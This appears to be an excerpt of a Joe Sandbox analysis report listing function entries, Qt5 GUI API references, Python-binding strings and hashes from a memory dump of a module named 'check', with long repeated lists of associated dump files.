Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Angles@EulerQuaternion@@Vector3malloc
String ID: QQuaternion$toEulerAngles$toEulerAngles(self) -> QVector3D
API String ID: 3712528003-2283685192
Opcode ID: 7e3543c64e3df37fa38a4e55f61289b1c16355f2d4c9c8dffbea9ed1da48aed5
Instruction ID: 02b172241a76844d5314a8e66dab86dc7c2659031a8ffe1a79a5178475cb9219
Opcode Fuzzy Hash: 7e3543c64e3df37fa38a4e55f61289b1c16355f2d4c9c8dffbea9ed1da48aed5
Instruction Fuzzy Hash: E51109B5B18A46C1EB109F75E8587A937A8FB55B84FA180B6CD0D03360DF7DD54AC380

Function 00007FFB9A351C40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?lastCursorPosition@QTextFrame@@QEBA?AVQTextCursor@@XZ.QT5GUI ref: 00007FFB9A351C98

Strings

QTextFrame, xrefs: 00007FFB9A351CD7
lastCursorPosition(self) -> QTextCursor, xrefs: 00007FFB9A351CC4
lastCursorPosition, xrefs: 00007FFB9A351CD0

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?lastCursorCursor@@Frame@@Position@malloc
String ID: QTextFrame$lastCursorPosition$lastCursorPosition(self) -> QTextCursor
API String ID: 2004441888-3917110963
Opcode ID: 6f00d1b4941bb622968369c23e364418ce4f8e0876bb36c729c5f4703fcaa84d
Instruction ID: 94f4c3927cb43cb0c0617c697d5901ce2be61bc0c3367db306efe087ac3ee69e
Opcode Fuzzy Hash: 6f00d1b4941bb622968369c23e364418ce4f8e0876bb36c729c5f4703fcaa84d
Instruction Fuzzy Hash: 44115BB5B08A4681EB10DF75E8496A933A8FB59B95FA180B6CE1C43320CF7DD549C740

Function 00007FFB9A317C40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?normalized@QVector4D@@QEBA?AV1@XZ.QT5GUI ref: 00007FFB9A317C98

Strings

normalized, xrefs: 00007FFB9A317CD0
normalized(self) -> QVector4D, xrefs: 00007FFB9A317CC4
QVector4D, xrefs: 00007FFB9A317CD7

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?normalized@Vector4malloc
String ID: QVector4D$normalized$normalized(self) -> QVector4D
API String ID: 1827766097-3323703988
Opcode ID: 6ad133072ab4736a3ec3400560e1fbd9a32b697ca5d6c2a7e48dbb69081b56d8
Instruction ID: c4993687eec4de5087e7683368071a38b6cf105b0cb3b66557edb68fe5801009
Opcode Fuzzy Hash: 6ad133072ab4736a3ec3400560e1fbd9a32b697ca5d6c2a7e48dbb69081b56d8
Instruction Fuzzy Hash: 011109B5B08A46C1EB109F75E8486A937A8FB55B84FA180B6CE5C43320DF7CE58AC740

Function 00007FFB9A3098E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?availableVirtualGeometry@QScreen@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FFB9A309938

Strings

QScreen, xrefs: 00007FFB9A309977
availableVirtualGeometry(self) -> QRect, xrefs: 00007FFB9A309964
availableVirtualGeometry, xrefs: 00007FFB9A309970

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?availableGeometry@Rect@@Screen@@Virtualmalloc
String ID: QScreen$availableVirtualGeometry$availableVirtualGeometry(self) -> QRect
API String ID: 1132034619-658668139
Opcode ID: 70d772deee132c2f6916f7c94332a95f0946ec1b54fa0302aec55bb99a440d91
Instruction ID: 9039b33b26defc3651aba7d1af4e64360a0f2d18d53d59b4a9fcb864e76f488a
Opcode Fuzzy Hash: 70d772deee132c2f6916f7c94332a95f0946ec1b54fa0302aec55bb99a440d91
Instruction Fuzzy Hash: C01139B5B08A56C1FB20DB35E8586A933A8FB55B84FA140B6CE4D03320CF7CE589C340

Function 00007FFB9A2DF8D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?rect@QTextLine@@QEBA?AVQRectF@@XZ.QT5GUI ref: 00007FFB9A2DF928

Strings

rect, xrefs: 00007FFB9A2DF960
QTextLine, xrefs: 00007FFB9A2DF967
rect(self) -> QRectF, xrefs: 00007FFB9A2DF954

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?rect@Line@@RectTextmalloc
String ID: QTextLine$rect$rect(self) -> QRectF
API String ID: 462638365-1962109089
Opcode ID: cf662239448839f31bbee6e476c7c48ccff74cdc4ded2e7cf32c01e261c62c5a
Instruction ID: 9b389476c2a8e77b935670b88944912d3b0d51b6ddefdd713bd4083075640be9
Opcode Fuzzy Hash: cf662239448839f31bbee6e476c7c48ccff74cdc4ded2e7cf32c01e261c62c5a
Instruction Fuzzy Hash: DC1105B5B08A46C1EB20DF65E8987A933A8FB55B84FA180B6DE4D07320DF7DE549C740

Function 00007FFB9A2D7910 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?maximumMargins@QPageLayout@@QEBA?AVQMarginsF@@XZ.QT5GUI ref: 00007FFB9A2D7968

Strings

maximumMargins, xrefs: 00007FFB9A2D79A0
maximumMargins(self) -> QMarginsF, xrefs: 00007FFB9A2D7994
QPageLayout, xrefs: 00007FFB9A2D79A7

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?maximumLayout@@MarginsMargins@Pagemalloc
String ID: QPageLayout$maximumMargins$maximumMargins(self) -> QMarginsF
API String ID: 3742586513-3312970886
Opcode ID: 29ed9372ce1a48b58f039bdc3f7f8c0caf04ea248d9f56e02cf6a01735cbe073
Instruction ID: c515dc9b9d20c04ddab7f10581c911230642a443fdfeddd2c8e3605283d7fb9d
Opcode Fuzzy Hash: 29ed9372ce1a48b58f039bdc3f7f8c0caf04ea248d9f56e02cf6a01735cbe073
Instruction Fuzzy Hash: 231109B5B08B4681EB10DF75E8486A937A8FB95B84FA140B6CD5D03320CF7DD549C780

Function 00007FFB9A3358D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?clipRegion@QPainter@@QEBA?AVQRegion@@XZ.QT5GUI ref: 00007FFB9A335928

Strings

clipRegion, xrefs: 00007FFB9A335960
clipRegion(self) -> QRegion, xrefs: 00007FFB9A335954
QPainter, xrefs: 00007FFB9A335967

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?clipPainter@@Region@Region@@malloc
String ID: QPainter$clipRegion$clipRegion(self) -> QRegion
API String ID: 3434069321-3021533290
Opcode ID: 2797176d68d83b686acfcc6bdf3f721bc0506a80fcea6d86ed3d457d62377268
Instruction ID: f4c1b8938f1bd354a60ec7f37d8ea14123570904fcbc21327450a6060e956dc2
Opcode Fuzzy Hash: 2797176d68d83b686acfcc6bdf3f721bc0506a80fcea6d86ed3d457d62377268
Instruction Fuzzy Hash: 351109B5A18A86C1EB10DF75E8586A937A8FB95B94FA180B6CE4D03320DF7CD949C340

Function 00007FFB9A2FF950 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

?reportContentOrientationChange@QWindow@@QEAAXW4ScreenOrientation@Qt@@@Z.QT5GUI ref: 00007FFB9A2FF9B2

Strings

reportContentOrientationChange(self, orientation: Qt.ScreenOrientation), xrefs: 00007FFB9A2FF9D5
reportContentOrientationChange, xrefs: 00007FFB9A2FF9E1
QWindow, xrefs: 00007FFB9A2FF9E8

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?reportChange@ContentOrientationOrientation@Qt@@@ScreenWindow@@
String ID: QWindow$reportContentOrientationChange$reportContentOrientationChange(self, orientation: Qt.ScreenOrientation)
API String ID: 1215209452-1000199096
Opcode ID: 6727e4980abbbf095930d45dc1becf1c22b216675a6ac41fcf949e31c130a0ca
Instruction ID: da48aa8c4d1e475bfbcae2c977640429ba5adb41a2bf0fdf048ad0197393bf11
Opcode Fuzzy Hash: 6727e4980abbbf095930d45dc1becf1c22b216675a6ac41fcf949e31c130a0ca
Instruction Fuzzy Hash: AD112EB5A18F4AC1EB20DF25E8886A933B8FB48B84FA14172CA5D03320DF7DD546C740

Function 00007FFB9A2D5940 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?pageSize@QPageLayout@@QEBA?AVQPageSize@@XZ.QT5GUI ref: 00007FFB9A2D5998

Strings

QPageLayout, xrefs: 00007FFB9A2D59D7
pageSize(self) -> QPageSize, xrefs: 00007FFB9A2D59C4
pageSize, xrefs: 00007FFB9A2D59D0

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Page$?pageLayout@@Size@Size@@malloc
String ID: QPageLayout$pageSize$pageSize(self) -> QPageSize
API String ID: 2613872021-2360139822
Opcode ID: 5860a83f2e1248027eff42ce66db99774413a80c30333736479cffde4161f252
Instruction ID: 8fff228cc1e8019278c7eb686f4cd1c50c6b3cf70ab68a6c3a60259d5010645f
Opcode Fuzzy Hash: 5860a83f2e1248027eff42ce66db99774413a80c30333736479cffde4161f252
Instruction Fuzzy Hash: 211109B5A09A4681EB10DB75E8486A937A8FB95B84FA140B6C95D03320DFBDD549C780

Function 00007FFB9A32F990 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?supportedWritingSystems@QRawFont@@QEBA?AV?$QList@W4WritingSystem@QFontDatabase@@@@XZ.QT5GUI ref: 00007FFB9A32F9E8

Strings

supportedWritingSystems(self) -> List[QFontDatabase.WritingSystem], xrefs: 00007FFB9A32FA14
QRawFont, xrefs: 00007FFB9A32FA27
supportedWritingSystems, xrefs: 00007FFB9A32FA20

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
